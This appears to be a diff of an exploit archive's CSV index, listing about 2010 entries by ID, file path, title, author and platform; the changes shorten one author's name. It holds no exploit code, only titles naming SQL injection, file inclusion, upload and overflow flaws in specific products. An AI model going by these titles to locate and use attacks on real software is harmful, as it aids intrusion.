11826,platforms/php/webapps/11826.txt,"Jewelry Cart Software (product.php) SQL Injection Vulnerability",2010-03-21,Asyraf,php,webapps,0
11827,platforms/windows/dos/11827.py,"no$gba 2.5c (.nds) local crash",2010-03-21,l3D,windows,dos,0
11828,platforms/windows/local/11828.py,"Crimson Editor r3.70 SEH Overwrite Vulnerability PoC exploit",2010-03-21,mr_me,windows,local,0
@ -10892,7 +10892,7 @@ id,file,description,date,author,platform,type,port
11928,platforms/php/webapps/11928.txt,"Joomla Component com_business SQL Injection Vulnerability",2010-03-29,"DevilZ TM",php,webapps,0
11929,platforms/php/webapps/11929.txt,"Joomla Component com_radio SQL Injection Vulnerability",2010-03-29,"DevilZ TM",php,webapps,0
11930,platforms/windows/dos/11930.pl,"ASX to MP3 Converter 3.0.0.100 - Local Stack Overflow PoC",2010-03-29,mat,windows,dos,0
11931,platforms/asp/webapps/11931.txt,"Asp - comersus7F Shopping Cart Software Backup Dump Vulnerability",2010-03-29,"indoushka salah el ddine",asp,webapps,0
11931,platforms/asp/webapps/11931.txt,"Asp - comersus7F Shopping Cart Software Backup Dump Vulnerability",2010-03-29,indoushka,asp,webapps,0
11932,platforms/linux/dos/11932.txt,"xwine 1.0.1 (.exe file) - Local Crash PoC Exploit",2010-03-29,JosS,linux,dos,0
11934,platforms/php/webapps/11934.txt,"Powie's PSCRIPT Gästebuch <= 2.09 SQL Injection Vulnerability",2010-03-29,"Easy Laster",php,webapps,0
11935,platforms/php/webapps/11935.txt,"Joomla Component com_guide SQL Injection Vulnerability",2010-03-30,"DevilZ TM",php,webapps,0
@ -10903,12 +10903,12 @@ id,file,description,date,author,platform,type,port
11942,platforms/php/webapps/11942.txt,"Joomla Component com_actions SQL Injection Vulnerability",2010-03-29,"DevilZ TM",php,webapps,0
11943,platforms/php/webapps/11943.txt,"React software [local file inclusion]",2010-03-29,SNK,php,webapps,0
11944,platforms/windows/local/11944.pl,"ASX to MP3 Converter 3.0.0.100 - (.pls) Universal Stack Overflow Exploit",2010-03-28,mat,windows,local,0
11946,platforms/php/webapps/11946.txt,"FaMarket 2 - (Auth Bypass) Vulnerability",2010-03-30,"indoushka salah el ddine",php,webapps,0
11947,platforms/php/webapps/11947.txt,"Yamamah 1.00 - Mullti Vulnerability",2010-03-30,"indoushka salah el ddine",php,webapps,0
11948,platforms/php/webapps/11948.txt,"Denapars Shop Script Mullti Vulnerability",2010-03-30,"indoushka salah el ddine",php,webapps,0
11949,platforms/php/webapps/11949.txt,"Fa-Ads (Auth Bypass) Vulnerability",2010-03-30,"indoushka salah el ddine",php,webapps,0
11950,platforms/php/webapps/11950.txt,"Fa Home (Auth Bypass) Vulnerability",2010-03-30,"indoushka salah el ddine",php,webapps,0
11951,platforms/php/webapps/11951.txt,"E-book Store Mullti Vulnerability",2010-03-30,"indoushka salah el ddine",php,webapps,0
11946,platforms/php/webapps/11946.txt,"FaMarket 2 - (Auth Bypass) Vulnerability",2010-03-30,indoushka,php,webapps,0
11947,platforms/php/webapps/11947.txt,"Yamamah 1.00 - Mullti Vulnerability",2010-03-30,indoushka,php,webapps,0
11948,platforms/php/webapps/11948.txt,"Denapars Shop Script Mullti Vulnerability",2010-03-30,indoushka,php,webapps,0
11949,platforms/php/webapps/11949.txt,"Fa-Ads (Auth Bypass) Vulnerability",2010-03-30,indoushka,php,webapps,0
11950,platforms/php/webapps/11950.txt,"Fa Home (Auth Bypass) Vulnerability",2010-03-30,indoushka,php,webapps,0
11951,platforms/php/webapps/11951.txt,"E-book Store Mullti Vulnerability",2010-03-30,indoushka,php,webapps,0
11953,platforms/windows/local/11953.py,"RM Downloader 3.0.2.1 (.asx) Local Buffer Overflow (SEH)",2010-03-30,b0telh0,windows,local,0
11954,platforms/php/webapps/11954.txt,"Wazzum Dating Software Mullti Vulnerability",2010-03-30,EL-KAHINA,php,webapps,0
11955,platforms/windows/dos/11955.py,"All to All Audio Convertor 2.0 - Files Stack Overflow PoC",2010-03-30,ITSecTeam,windows,dos,0
@ -10916,13 +10916,13 @@ id,file,description,date,author,platform,type,port
11958,platforms/windows/local/11958.py,"ASX to MP3 Converter 3.0.0.100 - Local stack overflow exploit",2010-03-30,"Hazem mofeed",windows,local,0
11959,platforms/windows/dos/11959.pl,"Xilisoft Blackberry Ring Tone Maker .wma Local Crash",2010-03-30,anonymous,windows,dos,0
11960,platforms/php/webapps/11960.txt,"KimsQ 040109 Multiple Remote File Include Vulnerability",2010-03-30,mat,php,webapps,0
11962,platforms/php/webapps/11962.txt,"Satellite-X 4.0 (Auth Bypass) SQL Injection Vulnerability",2010-03-30,"indoushka salah el ddine",php,webapps,0
11962,platforms/php/webapps/11962.txt,"Satellite-X 4.0 (Auth Bypass) SQL Injection Vulnerability",2010-03-30,indoushka,php,webapps,0
11963,platforms/php/webapps/11963.txt,"Huron CMS 8 11 2007 (Auth Bypass) SQL Injection Vulnerability",2010-03-30,mat,php,webapps,0
11964,platforms/multiple/webapps/11964.pl,"Easy-Clanpage <= 2.1 - SQL Injection Exploit",2010-03-30,"Easy Laster",multiple,webapps,0
11965,platforms/php/webapps/11965.txt,"kora Reinstall Admin Information Vulnerability",2010-03-30,"indoushka salah el ddine",php,webapps,0
11965,platforms/php/webapps/11965.txt,"kora Reinstall Admin Information Vulnerability",2010-03-30,indoushka,php,webapps,0
11966,platforms/windows/dos/11966.py,"Easy Icon Maker .ico File Reading Crash",2010-03-30,ITSecTeam,windows,dos,0
11967,platforms/php/webapps/11967.txt,"Snipe Photo Gallery - Bypass Remote Upload Vulnerability",2010-03-30,"indoushka salah el ddine",php,webapps,0
11968,platforms/php/webapps/11968.txt,"Hosting-php-dynamic (Auth Bypass) Vulnerability",2010-03-30,"indoushka salah el ddine",php,webapps,0
11967,platforms/php/webapps/11967.txt,"Snipe Photo Gallery - Bypass Remote Upload Vulnerability",2010-03-30,indoushka,php,webapps,0
11968,platforms/php/webapps/11968.txt,"Hosting-php-dynamic (Auth Bypass) Vulnerability",2010-03-30,indoushka,php,webapps,0
11973,platforms/windows/remote/11973.txt,"CompleteFTP Server Directory Traversal",2010-03-30,zombiefx,windows,remote,0
11974,platforms/windows/remote/11974.py,"HP OpenView NNM OvWebHelp.exe CGI Topic overflow",2010-03-30,"S2 Crew",windows,remote,0
11975,platforms/windows/dos/11975.rb,"Free MP3 CD Ripper 2.6 - 0day (1)",2010-03-30,"Richard leahy",windows,dos,0
@ -10937,7 +10937,7 @@ id,file,description,date,author,platform,type,port
11985,platforms/windows/dos/11985.sh,"BitComet <= 1.19 Remote DoS Exploit",2010-03-31,"Pierre Nogues",windows,dos,0
11986,platforms/linux/remote/11986.py,"OpenDcHub 0.8.1 - Remote Code Execution Exploit",2010-03-31,"Pierre Nogues",linux,remote,0
11987,platforms/windows/dos/11987.txt,"Escape From PDF",2010-03-31,"Didier Stevens",windows,dos,0
11989,platforms/php/webapps/11989.txt,"Faweb_2 Mullti Vulnerability",2010-03-30,"indoushka salah el ddine",php,webapps,0
11989,platforms/php/webapps/11989.txt,"Faweb_2 Mullti Vulnerability",2010-03-30,indoushka,php,webapps,0
11990,platforms/php/webapps/11990.txt,"Joomla Component com_network SQL Injection Vulnerability",2010-04-01,"DevilZ TM",php,webapps,0
11991,platforms/php/webapps/11991.txt,"Joomla Component com_tour SQL Injection Vulnerability",2010-04-01,"DevilZ TM",php,webapps,0
11992,platforms/php/webapps/11992.txt,"Joomla Component com_trading Blind SQL Injection Vulnerability",2010-04-01,"DevilZ TM",php,webapps,0
@ -10950,11 +10950,11 @@ id,file,description,date,author,platform,type,port
11999,platforms/php/webapps/11999.txt,"Joomla Component webERPcustomer Local File Inclusion",2010-04-01,"Chip d3 bi0s",php,webapps,0
12000,platforms/windows/dos/12000.pl,"Kwik Pay Payroll 4.10.3 - (.mdb) Crash PoC",2010-04-01,anonymous,windows,dos,0
12001,platforms/windows/dos/12001.pl,"Kwik Pay Payroll 4.10.3 - (.zip) DoS",2010-04-01,anonymous,windows,dos,0
12002,platforms/php/webapps/12002.txt,"Musicbox 3.3 - Upload Shell Vulnerability",2010-04-01,"indoushka salah el ddine",php,webapps,0
12002,platforms/php/webapps/12002.txt,"Musicbox 3.3 - Upload Shell Vulnerability",2010-04-01,indoushka,php,webapps,0
12003,platforms/php/webapps/12003.txt,"onepound Shop / CMS XSS and SQL Injection Vulnerabilities",2010-04-01,Valentin,php,webapps,0
12004,platforms/php/webapps/12004.txt,"PHP Jokesite 2.0 - exec Command Exploit",2010-04-01,"indoushka salah el ddine",php,webapps,0
12004,platforms/php/webapps/12004.txt,"PHP Jokesite 2.0 - exec Command Exploit",2010-04-01,indoushka,php,webapps,0
12005,platforms/php/webapps/12005.txt,"Profi Einzelgebots Auktions System Blind SQL Injection Vulnerability",2010-04-01,"Easy Laster",php,webapps,0
12006,platforms/php/webapps/12006.txt,"Simple Calculator by Peter Rekdal Sunde Remote Upload Vulnerability",2010-04-01,"indoushka salah el ddine",php,webapps,0
12006,platforms/php/webapps/12006.txt,"Simple Calculator by Peter Rekdal Sunde Remote Upload Vulnerability",2010-04-01,indoushka,php,webapps,0
12007,platforms/php/webapps/12007.txt,"SimpNews 2.16.2 and Below Multiple SQL Injection Vulnerabilities",2010-04-01,NoGe,php,webapps,0
12008,platforms/windows/local/12008.pl,"TugZip 3.5 Zip File Buffer Overflow",2010-04-01,Lincoln,windows,local,0
12009,platforms/php/webapps/12009.html,"CMS Made Simple 1.7 CSRF Vulnerability",2010-04-02,"pratul agrawal",php,webapps,0
@ -10982,11 +10982,11 @@ id,file,description,date,author,platform,type,port
12035,platforms/windows/local/12035.pl,"ZipScan 2.2c SEH",2010-04-03,"Lincoln and corelanc0d3r",windows,local,0
12036,platforms/hardware/webapps/12036.txt,"Edimax AR-7084GA Router CSRF + Persistent XSS Exploit",2010-04-03,l3D,hardware,webapps,0
12037,platforms/php/webapps/12037.txt,"Joomla component jp_jobs SQL Injection Vulnerability",2010-04-03,Valentin,php,webapps,0
12038,platforms/php/webapps/12038.txt,"Advanced Management For Services Sites Bypass Create And Download SQL Backup Vulnerability",2010-04-04,"indoushka salah el ddine",php,webapps,0
12039,platforms/multiple/webapps/12039.txt,"QuickEStore 6.1 Backup Dump Vulnerability",2010-04-04,"indoushka salah el ddine",multiple,webapps,0
12038,platforms/php/webapps/12038.txt,"Advanced Management For Services Sites Bypass Create And Download SQL Backup Vulnerability",2010-04-04,indoushka,php,webapps,0
12039,platforms/multiple/webapps/12039.txt,"QuickEStore 6.1 Backup Dump Vulnerability",2010-04-04,indoushka,multiple,webapps,0
12041,platforms/php/webapps/12041.txt,"Solutive CMS SQL Injection Vulnerability",2010-04-04,"Th3 RDX",php,webapps,0
12042,platforms/php/webapps/12042.txt,"x10 mirco blogging 121 - SQL Injection Vulnerability",2010-04-04,ITSecTeam,php,webapps,0
12043,platforms/php/webapps/12043.html,"Prediction League 0.3.8 CSRF Create Admin User Exploit",2010-04-04,"indoushka salah el ddine",php,webapps,0
12043,platforms/php/webapps/12043.html,"Prediction League 0.3.8 CSRF Create Admin User Exploit",2010-04-04,indoushka,php,webapps,0
12044,platforms/windows/remote/12044.c,"Easy Ftp Server 1.7.0.2 - MKD Remote Post-Authentication BoF Exploit",2010-04-04,x90c,windows,remote,0
12045,platforms/php/webapps/12045.html,"MunkyScripts Simple Gallery SQL Injection Vulnerability",2010-04-04,ITSecTeam,php,webapps,0
12047,platforms/php/webapps/12047.html,"nodesforum 1.033 - Remote File Inclusion Vulnerability",2010-04-04,ITSecTeam,php,webapps,0
@ -11019,7 +11019,7 @@ id,file,description,date,author,platform,type,port
12076,platforms/php/webapps/12076.pl,"ilchClan <= 1.0.5 (cid) SQL Injection Vulnerability & Exploit",2010-04-05,"Easy Laster",php,webapps,0
12077,platforms/php/webapps/12077.txt,"Joomla Component News Portal com_news Local File Inclusion Vulnerability",2010-04-06,AntiSecurity,php,webapps,0
12078,platforms/php/webapps/12078.txt,"Joomla Freestyle FAQ Lite Component 1.3 com_fss (faqid) SQL Injection",2010-04-06,"Chip d3 bi0s",php,webapps,0
12079,platforms/windows/dos/12079.pl,"Microsoft Office (2010 beta) Communicator SIP Denial of Service Exploit",2010-04-06,"indoushka salah el ddine",windows,dos,0
12079,platforms/windows/dos/12079.pl,"Microsoft Office (2010 beta) Communicator SIP Denial of Service Exploit",2010-04-06,indoushka,windows,dos,0
12080,platforms/windows/dos/12080.txt,"Foxit Reader <= 3.2.1.0401 Denial of Service Exploit",2010-04-06,juza,windows,dos,0
12081,platforms/windows/dos/12081.php,"Jzip 1.3 (.zip) - Unicode Buffer Overflow PoC (0day)",2010-04-06,mr_me,windows,dos,0
12082,platforms/php/webapps/12082.txt,"Joomla Component Saber Cart com_sebercart Local File Inclusion Vulnerability",2010-04-06,AntiSecurity,php,webapps,0
@ -11044,8 +11044,8 @@ id,file,description,date,author,platform,type,port
12102,platforms/php/webapps/12102.txt,"Joomla Component VJDEO com_vjdeo 1.0 LFI Vulnerability",2010-04-07,"Angela Zhang",php,webapps,0
12103,platforms/multiple/local/12103.txt,"Local Glibc shared library (.so) <= 2.11.1 exploit",2010-04-07,Rh0,multiple,local,0
12104,platforms/windows/dos/12104.py,"Anyzip 1.1 - (.zip) Poc (SEH) 0day",2010-04-07,ITSecTeam,windows,dos,0
12105,platforms/php/webapps/12105.txt,"Free Image & File Hosting Upload Vulnerability",2010-04-07,"indoushka salah el ddine",php,webapps,0
12106,platforms/php/webapps/12106.txt,"Istgah for Centerhost Mullti Vulnerability",2010-04-07,"indoushka salah el ddine",php,webapps,0
12105,platforms/php/webapps/12105.txt,"Free Image & File Hosting Upload Vulnerability",2010-04-07,indoushka,php,webapps,0
12106,platforms/php/webapps/12106.txt,"Istgah for Centerhost Mullti Vulnerability",2010-04-07,indoushka,php,webapps,0
12107,platforms/php/webapps/12107.txt,"Plume CMS 1.2.4 - Multiple Local File Inclusion Vulnerabilities",2010-04-07,eidelweiss,php,webapps,0
12108,platforms/php/webapps/12108.txt,"Joomla Component com_articles SQL Injection Vulnerability",2010-04-08,"pratul agrawal",php,webapps,0
12109,platforms/multiple/dos/12109.txt,"Multiple Vendor librpc.dll Signedness Error Remote Code Execution Vulnerability",2010-04-08,ZSploit.com,multiple,dos,0
@ -11073,7 +11073,7 @@ id,file,description,date,author,platform,type,port
12136,platforms/php/webapps/12136.txt,"Joomla Component com_properties[aid] SQL Injection Vulnerability",2010-04-10,c4uR,php,webapps,0
12137,platforms/php/webapps/12137.txt,"joomla component allvideos BLIND SQL injection Vulnerability",2010-04-10,bumble_be,php,webapps,0
12138,platforms/php/webapps/12138.txt,"Joomla Com_Ca SQL Injection Vulnerability",2010-04-10,DigitALL,php,webapps,0
12139,platforms/php/webapps/12139.txt,"Kiasabz Article News CMS Magazine SQL Injection Vulnerability",2010-04-10,"indoushka salah el ddine",php,webapps,0
12139,platforms/php/webapps/12139.txt,"Kiasabz Article News CMS Magazine SQL Injection Vulnerability",2010-04-10,indoushka,php,webapps,0
12140,platforms/php/webapps/12140.php,"xBtiTracker Remote SQL Injection Vulnerability",2010-04-11,InATeam,php,webapps,0
12141,platforms/php/webapps/12141.txt,"MediaInSpot CMS LFI Vulnerability",2010-04-11,"Amoo Arash",php,webapps,0
12142,platforms/php/webapps/12142.txt,"Joomla Component TweetLA! Local File Inclusion Vulnerability",2010-04-11,AntiSecurity,php,webapps,0
@ -11130,9 +11130,9 @@ id,file,description,date,author,platform,type,port
12193,platforms/php/webapps/12193.txt,"Openurgence vaccin 1.03 (RFI/LFI) Multiple File Include Vulnerability",2010-04-13,"cr4wl3r ",php,webapps,0
12194,platforms/php/webapps/12194.txt,"Police Municipale Open Main Courante 1.01beta (RFI/LFI) Multiple File Include Vulnerability",2010-04-13,"cr4wl3r ",php,webapps,0
12195,platforms/php/webapps/12195.rb,"joelz bulletin board <= 0.9.9rc3 multiple SQL Injection & Exploit",2010-04-13,"Easy Laster",php,webapps,0
12197,platforms/asp/webapps/12197.txt,"Mp3 MuZik Data Base Download Vulnerability",2010-04-13,"indoushka salah el ddine",asp,webapps,0
12198,platforms/php/webapps/12198.txt,"Games Script (Galore) Backup Dump Vulnerability",2010-04-13,"indoushka salah el ddine",php,webapps,0
12199,platforms/asp/webapps/12199.txt,"My School Script Data Base Download Vulnerability",2010-04-13,"indoushka salah el ddine",asp,webapps,0
12197,platforms/asp/webapps/12197.txt,"Mp3 MuZik Data Base Download Vulnerability",2010-04-13,indoushka,asp,webapps,0
12198,platforms/php/webapps/12198.txt,"Games Script (Galore) Backup Dump Vulnerability",2010-04-13,indoushka,php,webapps,0
12199,platforms/asp/webapps/12199.txt,"My School Script Data Base Download Vulnerability",2010-04-13,indoushka,asp,webapps,0
12200,platforms/php/webapps/12200.txt,"Joomla Component QPersonel SQL Injection Vulnerability",2010-04-13,Valentin,php,webapps,0
12201,platforms/windows/dos/12201.html,"MagnetoSoft DNS 4.0.0.9 - ActiveX DNSLookupHostWithServer PoC",2010-04-13,s4squatch,windows,dos,0
12202,platforms/windows/remote/12202.html,"MagnetoSoft ICMP 4.0.0.18 - ActiveX AddDestinationEntry BOF",2010-04-13,s4squatch,windows,remote,0
@ -11145,14 +11145,14 @@ id,file,description,date,author,platform,type,port
12212,platforms/php/webapps/12212.txt,"Opentel Openmairie tel 1.02 Local File Include Vulnerability",2010-04-14,"cr4wl3r ",php,webapps,0
12213,platforms/windows/local/12213.c,"Micropoint Proactive Denfense Mp110013.sys <= 1.3.10123.0 - Local Privilege Escalation Exploit",2010-04-14,MJ0011,windows,local,0
12217,platforms/multiple/dos/12217.py,"Remote Exploit Against the Aircrack-NG Tools svn r1675",2010-04-14,"Lukas Lueg",multiple,dos,0
12218,platforms/asp/webapps/12218.txt,"School Management System Pro 6.0.0 Backup Dump Vulnerability",2010-04-14,"indoushka salah el ddine",asp,webapps,0
12219,platforms/php/webapps/12219.txt,"Mp3 Online Id Tag Editor RFI Vulnerability",2010-04-14,"indoushka salah el ddine",php,webapps,0
12218,platforms/asp/webapps/12218.txt,"School Management System Pro 6.0.0 Backup Dump Vulnerability",2010-04-14,indoushka,asp,webapps,0
12219,platforms/php/webapps/12219.txt,"Mp3 Online Id Tag Editor RFI Vulnerability",2010-04-14,indoushka,php,webapps,0
12220,platforms/php/webapps/12220.txt,"Almnzm <= 2.1 - SQL Injection Vulnerability",2010-04-14,"NeX HaCkEr",php,webapps,0
12221,platforms/php/webapps/12221.rb,"Bild Flirt <= 1.0 - SQL Injection Vulnerability Exploit",2010-04-14,"Easy Laster",php,webapps,0
12222,platforms/php/webapps/12222.txt,"PhpMesFilms 1.8 - SQL Injection Vulnerability",2010-04-14,"indoushka salah el ddine",php,webapps,0
12223,platforms/php/webapps/12223.txt,"Multi-Mirror Remote Upload Vulnerability",2010-04-14,"indoushka salah el ddine",php,webapps,0
12224,platforms/php/webapps/12224.txt,"Mihalism Multi Host 4.0.0 - Upload Vulnerability",2010-04-14,"indoushka salah el ddine",php,webapps,0
12226,platforms/php/webapps/12226.txt,"Magic Uploader Mini Upload Vulnerability",2010-04-14,"indoushka salah el ddine",php,webapps,0
12222,platforms/php/webapps/12222.txt,"PhpMesFilms 1.8 - SQL Injection Vulnerability",2010-04-14,indoushka,php,webapps,0
12223,platforms/php/webapps/12223.txt,"Multi-Mirror Remote Upload Vulnerability",2010-04-14,indoushka,php,webapps,0
12224,platforms/php/webapps/12224.txt,"Mihalism Multi Host 4.0.0 - Upload Vulnerability",2010-04-14,indoushka,php,webapps,0
12226,platforms/php/webapps/12226.txt,"Magic Uploader Mini Upload Vulnerability",2010-04-14,indoushka,php,webapps,0
12227,platforms/php/webapps/12227.txt,"YUI Images Script Shell Upload Vulnerability",2010-04-14,Mr.P3rfekT,php,webapps,0
12228,platforms/windows/dos/12228.py,"MovieLibrary 1.4.401 - Local DoS (.dmv)",2010-04-14,anonymous,windows,dos,0
12229,platforms/windows/dos/12229.py,"Book Library 1.4.162 - Local DoS (.bkd)",2010-04-14,anonymous,windows,dos,0
@ -11201,8 +11201,8 @@ id,file,description,date,author,platform,type,port
12274,platforms/windows/dos/12274.py,"Multiple Vendor AgentX++ Stack Buffer Overflow",2010-04-17,ZSploit.com,windows,dos,0
12276,platforms/php/webapps/12276.txt,"redaxo cms 4.2.1 - Remote File Inclusion Vulnerability",2010-04-18,eidelweiss,php,webapps,0
12277,platforms/php/webapps/12277.txt,"Openscrutin 1.03 (RFI/LFI) Multiple File Include Vulnerability",2010-04-18,"cr4wl3r ",php,webapps,0
12278,platforms/php/webapps/12278.txt,"Alegro 1.2.1 - SQL Injection Vulnerability",2010-04-18,"indoushka salah el ddine",php,webapps,0
12279,platforms/php/webapps/12279.txt,"eclime 1.1 - Bypass / Create and Download Backup Vulnerability",2010-04-18,"indoushka salah el ddine",php,webapps,0
12278,platforms/php/webapps/12278.txt,"Alegro 1.2.1 - SQL Injection Vulnerability",2010-04-18,indoushka,php,webapps,0
12279,platforms/php/webapps/12279.txt,"eclime 1.1 - Bypass / Create and Download Backup Vulnerability",2010-04-18,indoushka,php,webapps,0
12280,platforms/php/webapps/12280.txt,"dl_stats Multiple Vulnerabilities",2010-04-18,"Valentin Hoebel",php,webapps,0
12282,platforms/php/webapps/12282.txt,"Joomla Component Archery Scores (com_archeryscores) 1.0.6 - LFI Vulnerability",2010-04-18,"wishnusakti + inc0mp13te",php,webapps,0
12283,platforms/php/webapps/12283.txt,"Joomla Component ZiMB Comment com_zimbcomment Local File Inclusion Vulnerability",2010-04-18,AntiSecurity,php,webapps,0
@ -11291,10 +11291,10 @@ id,file,description,date,author,platform,type,port
12380,platforms/windows/remote/12380.pl,"Rumba ftp Client 4.2 PASV BoF (SEH)",2010-04-25,zombiefx,windows,remote,0
12381,platforms/php/webapps/12381.php,"phpegasus (fckeditor) Remote Arbitrary File Upload Exploit",2010-04-25,eidelweiss,php,webapps,0
12382,platforms/multiple/dos/12382.txt,"Invision Power Board - Denial of Service (0day)",2010-04-25,SeeMe,multiple,dos,0
12383,platforms/php/webapps/12383.txt,"clipak Upload Vulnerability",2010-04-25,"indoushka salah el ddine",php,webapps,0
12383,platforms/php/webapps/12383.txt,"clipak Upload Vulnerability",2010-04-25,indoushka,php,webapps,0
12384,platforms/php/webapps/12384.txt,"Powered by iNetScripts: Shell Upload Vulnerability",2010-04-25,Sec-q8,php,webapps,0
12385,platforms/php/webapps/12385.html,"TR Forum 1.5 insert admin CSRF Vulnerability",2010-04-25,EL-KAHINA,php,webapps,0
12386,platforms/php/webapps/12386.txt,"PHP Classifieds 6.09 - E-mail Dump Vulnerability",2010-04-25,"indoushka salah el ddine",php,webapps,0
12386,platforms/php/webapps/12386.txt,"PHP Classifieds 6.09 - E-mail Dump Vulnerability",2010-04-25,indoushka,php,webapps,0
12387,platforms/php/webapps/12387.sh,"webessence 1.0.2 - Multiple Vulnerabilities",2010-04-25,"white_sheep, R00T_ATI and epicfail",php,webapps,0
12388,platforms/windows/local/12388.rb,"WM Downloader 3.0.0.9 - Buffer Overflow (Meta)",2010-04-25,blake,windows,local,0
12395,platforms/php/webapps/12395.txt,"2daybiz Advanced Poll Script XSS and Authentication Bypass",2010-04-26,Sid3^effects,php,webapps,0
@ -11303,7 +11303,7 @@ id,file,description,date,author,platform,type,port
12399,platforms/php/webapps/12399.txt,"Uiga Personal Portal index.php (view) SQL Injection",2010-04-26,41.w4r10r,php,webapps,0
12400,platforms/php/webapps/12400.txt,"Joomla Component com_joomradio SQL injection vulnerability",2010-04-26,Mr.tro0oqy,php,webapps,0
12401,platforms/multiple/dos/12401.html,"WebKit <= 532.5 Stack Exhaustion",2010-04-26,"Mathias Karlsson",multiple,dos,0
12402,platforms/php/webapps/12402.txt,"Kasseler CMS 2.0.5 - Bypass / Download Backup Vulnerability",2010-04-26,"indoushka salah el ddine",php,webapps,0
12402,platforms/php/webapps/12402.txt,"Kasseler CMS 2.0.5 - Bypass / Download Backup Vulnerability",2010-04-26,indoushka,php,webapps,0
12403,platforms/windows/local/12403.py,"IDEAL Administration 2010 10.2 - Local Buffer Overflow Exploit",2010-04-26,Dr_IDE,windows,local,0
12404,platforms/windows/local/12404.py,"IDEAL Migration 2009 4.5.1 - Local Buffer Overflow Exploit",2010-04-26,Dr_IDE,windows,local,0
12406,platforms/windows/local/12406.py,"Avast! 4.7 aavmker4.sys privilege escalation",2010-04-27,ryujin,windows,local,0
@ -11317,12 +11317,12 @@ id,file,description,date,author,platform,type,port
12415,platforms/php/webapps/12415.txt,"Infocus Real Estate Enterprise Edition Script Authentication Bypass",2010-04-27,Sid3^effects,php,webapps,0
12416,platforms/php/webapps/12416.txt,"PHP Quick Arcade 3.0.21 Multiple Vulnerabilites",2010-04-27,ITSecTeam,php,webapps,0
12417,platforms/windows/remote/12417.py,"Bigant Messenger <= 2.52 - (AntCore.dll) RegisterCom() Remote 0day Heap Overflow",2010-04-27,mr_me,windows,remote,0
12419,platforms/php/webapps/12419.txt,"Boutique SudBox 1.2 Changer Login et Mot de Passe CSRF Vulnerability",2010-04-27,"indoushka salah el ddine",php,webapps,0
12419,platforms/php/webapps/12419.txt,"Boutique SudBox 1.2 Changer Login et Mot de Passe CSRF Vulnerability",2010-04-27,indoushka,php,webapps,0
12420,platforms/php/webapps/12420.php,"Portaneo Portal 2.2.3 - Remote Arbitrary File Upload Exploit",2010-04-27,eidelweiss,php,webapps,0
12421,platforms/php/webapps/12421.txt,"Help Center Live 2.0.6 - (module=helpcenter&file=) Local File Inclusion",2010-04-27,41.w4r10r,php,webapps,0
12422,platforms/windows/dos/12422.pl,"Acoustica 3.32 CD/DVD Label Maker - .m3u PoC",2010-04-27,chap0,windows,dos,0
12423,platforms/php/webapps/12423.txt,"CLScript.com Classifieds Software SQL Injection Vunerability",2010-04-27,41.w4r10,php,webapps,0
12424,platforms/asp/webapps/12424.txt,"Acart <= 2.0 Shopping Cart Software Backup Dump Vulnerability",2010-04-27,"indoushka salah el ddine",asp,webapps,0
12424,platforms/asp/webapps/12424.txt,"Acart <= 2.0 Shopping Cart Software Backup Dump Vulnerability",2010-04-27,indoushka,asp,webapps,0
12425,platforms/windows/dos/12425.html,"Webkit (Safari 4.0.5) - Blink Tag Stack Exhaustion DoS",2010-04-27,Dr_IDE,windows,dos,0
12426,platforms/php/webapps/12426.txt,"Joomla Component Ultimate Portfolio com_ultimateportfolio Local File Inclusion Vulnerability",2010-04-27,AntiSecurity,php,webapps,0
12427,platforms/php/webapps/12427.txt,"Joomla Component NoticeBoard com_noticeboard Local File Inclusion Vulnerability",2010-04-27,AntiSecurity,php,webapps,0
@ -11344,16 +11344,16 @@ id,file,description,date,author,platform,type,port
12443,platforms/php/webapps/12443.txt,"Modelbook (casting_view.php) SQL Injection Vulnerability",2010-04-28,v3n0m,php,webapps,0
12444,platforms/php/webapps/12444.txt,"PHP Video Battle SQL Injection Vulnerability",2010-04-28,v3n0m,php,webapps,0
12445,platforms/php/webapps/12445.txt,"Articles Directory - Authenication Bypass Vulnerability",2010-04-29,Sid3^effects,php,webapps,0
12446,platforms/php/webapps/12446.txt,"TR Forum 1.5 Mullti Vulnerability",2010-04-29,"indoushka salah el ddine",php,webapps,0
12447,platforms/php/webapps/12447.txt,"XT-Commerce 1.0 Beta 1 => Pass / Creat and Download Backup Vulnerability",2010-04-29,"indoushka salah el ddine",php,webapps,0
12446,platforms/php/webapps/12446.txt,"TR Forum 1.5 Mullti Vulnerability",2010-04-29,indoushka,php,webapps,0
12447,platforms/php/webapps/12447.txt,"XT-Commerce 1.0 Beta 1 => Pass / Creat and Download Backup Vulnerability",2010-04-29,indoushka,php,webapps,0
12448,platforms/php/webapps/12448.txt,"Socialware 2.2 - Upload Vulnerability and XSS",2010-04-29,Sid3^effects,php,webapps,0
12449,platforms/php/webapps/12449.txt,"deV!L`z Clanportal 1.5 - Mullti Vulnerability",2010-04-29,"indoushka salah el ddine",php,webapps,0
12449,platforms/php/webapps/12449.txt,"deV!L`z Clanportal 1.5 - Mullti Vulnerability",2010-04-29,indoushka,php,webapps,0
12450,platforms/windows/webapps/12450.txt,"Microsoft SharePoint Server 2007 XSS Vulnerability",2010-04-29,"High-Tech Bridge SA",windows,webapps,0
12451,platforms/php/webapps/12451.txt,"iScripts VisualCaster - SQli Vulnerability",2010-04-29,Sid3^effects,php,webapps,0
12452,platforms/php/webapps/12452.txt,"TaskFreak 0.6.2 - SQL Injection Vulnerability",2010-04-29,"Justin C. Klein Keane",php,webapps,0
12453,platforms/php/webapps/12453.txt,"Zyke CMS 1.1 - Bypass Vulnerability",2010-04-29,"indoushka salah el ddine",php,webapps,0
12454,platforms/php/webapps/12454.txt,"Zyke CMS 1.0 - Remote File Upload Vulnerability",2010-04-29,"indoushka salah el ddine",php,webapps,0
12455,platforms/php/webapps/12455.txt,"Ucenter Projekt 2.0 Insecure crossdomain (XSS) Vulnerability",2010-04-29,"indoushka salah el ddine",php,webapps,0
12453,platforms/php/webapps/12453.txt,"Zyke CMS 1.1 - Bypass Vulnerability",2010-04-29,indoushka,php,webapps,0
12454,platforms/php/webapps/12454.txt,"Zyke CMS 1.0 - Remote File Upload Vulnerability",2010-04-29,indoushka,php,webapps,0
12455,platforms/php/webapps/12455.txt,"Ucenter Projekt 2.0 Insecure crossdomain (XSS) Vulnerability",2010-04-29,indoushka,php,webapps,0
12456,platforms/php/webapps/12456.txt,"chCounter indirect SQL Injection and XSS Vulnerabilities",2010-04-29,Valentin,php,webapps,0
12457,platforms/windows/dos/12457.txt,"Apple Safari 4.0.3 (Win32) CSS Remote Denial of Service Exploit",2010-04-29,ITSecTeam,windows,dos,0
12458,platforms/php/webapps/12458.txt,"Scratcher (SQL/XSS) Multiple Remote Vulnerability",2010-04-29,"cr4wl3r ",php,webapps,0
